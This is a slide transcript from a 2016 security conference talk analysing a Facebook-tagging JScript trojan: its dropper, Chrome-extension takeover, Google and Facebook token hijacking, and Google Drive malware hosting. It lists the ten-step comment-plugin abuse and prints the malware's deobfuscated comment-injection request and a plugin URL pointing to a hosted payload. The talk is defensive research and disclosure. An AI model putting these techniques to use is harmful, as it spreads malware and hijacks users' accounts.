[cb16] facebook malware: tag me if you can by ido naor & dani goland
TRANSCRIPT
TAG ME IF YOU CAN
Ido Naor, Sr. Researcher, Kaspersky Lab. Tw: @idonaor1
Dani Goland, Founder & CEO, Undot. Tw: @danigoland
GReAT - Kaspersky Lab Elite Team Of Researchers
Global Research & Analysis Team, Since 2008
Threat Intelligence, research and innovation leadership
Focus: APTs, critical infrastructure threat, banking threats, sophisticated targeted attacks.
• A decade in security eco
• Manage regional research in Israel
• ExpertiZ: Malware analysis, Reverse Engineering, Penetration Testing
• HobbiZ: Responsible Disclosure
Undot – Uncovering Ideas
• Founder & CEO, Undot
• ExpertiZ: Full-Stack Developer, Entrepreneur, Data Science Freak
• HobbiZ: Organizing and competing in Hackathons
Undot Experts with Control It – Remotes Unified! (~500K downloads)
Architecture slide: Front, Mobile, Back, Cloud.
IN THE NEWS…
RECAP
MENTIONED BY A FRIEND
WINDOWS DESIGNATED
• File: comment_27734045.jse
• Language: JScript
• Size: ~5.31 KB
• MD5: 9D3DF2A89FDB7DA40CEB4DE02D605CFA
• SHA1: 6D658331FE6D7F684FEE384A29CE95F561A5C2EA
JScript is Microsoft's dialect of the ECMAScript standard[2] that is used in Microsoft's Internet Explorer. JScript is implemented as an Active Scripting engine. This means that it can be "plugged in" to OLE Automation applications that support Active Scripting, such as Internet Explorer, Active Server Pages, and Windows Script Host.[3] It also means such applications can use multiple Active Scripting languages, e.g., JScript, VBScript or PerlScript.
GLIMPSE INTO THE JSE TROJAN
1) Domain name
2) Msxml2.XMLHTTP
3) ADODB.Stream
4) Wscript.Shell
5) JPG ext?
6) %AppData%
7) Autoit.exe
8) Manifest.json
9) Run.bat
10) Ping.js
WHO IS REALLY AMONG US?
/Stats/history/pingjse3462
BACKGROUND CHECK
• Emerged: January 2015 on
• Turkish variables and comments in its files
• Threat actor: BePush/Killim
• Innovative techniques to spread malware through social networks
• Favor multi-layered obfuscation, mainly in JavaScript, and utilize multi-layered URL shorteners, third-party hosting providers and multi-stage payloads.
• Obfuscate their infrastructure using Cloudflare
INITIAL INFECTION
DYNAMIC ANALYSIS
CHROME EXTENSION AS A MITM
A HIDDEN VULNERABILITY?
THE MISSING PIECE
OBFUSCATED DROPPER
DEOBFUSCATION
ANTI-ANALYSIS
• Debugger;
• Code hashes
GOOGLE TOKEN HIJACK
• Google URL Shortener
• Google Drive API
GOOGLE DRIVE AS A MALWARE HUB
VICTIM INFO STEALER
Dropper → Chrome Takeover → Malicious JS → Google Permissions → Uploading malware to storage → HERE
GOOGLE DRIVE PERMISSION MODIFICATION
CREATING MALICIOUS CALLERS
FACEBOOK TOKEN HIJACK
HOW TO FAIL SAFE
VULNERABILITY IN THE WILD
1) Initialize a request to the comment plugin
2) Get api_key & comment data
3) Create a comment on the plugin, containing url to Google Drive
4) Post is now posted – get its ID
5) Create a new comment on the web platform
6) Inject the ID from the FB plugin to the web FB comment ID
7) Notification generated
8) FB debug check
9) Set privacy to public
10) Set comment text to null, deleting the traces.
this.commentData["share_id"] = globalFunction["between"]('"commentIDs":["', '"', f["responseText"])["split"]("_")[1]; // 400539608410_10153962897128411

post_params = {
    "ft_ent_identifier": this["commentData"]["share_id"], // ← injection!!
    "comment_text": gF["chain"](10)["toLowerCase"](),
    "source": 21,
    "client_id": Date["now"]() + ":" + Math["floor"](U2e[F](Date["now"](), 1000)),
    "session_id": globalFunction["chain"](8)["toLowerCase"](),
    "comment_text": "Array of tagged friends"
}
url: "https://www.facebook.com/ufi/add/comment/?dpr=1",
type: "POST",
async: true,
headers: { "content-type": "application/x-www-form-urlencoded" }
www.facebook.com/plugins/feedback.php?api_key=<ID>&href=https://<GOOGLE_DRIVE>/<JSE_FILE>
ALL IN ALL
QUESTIONS?
THANK YOU! Follow us on Twitter: @IdoNaor1 @DaniGoland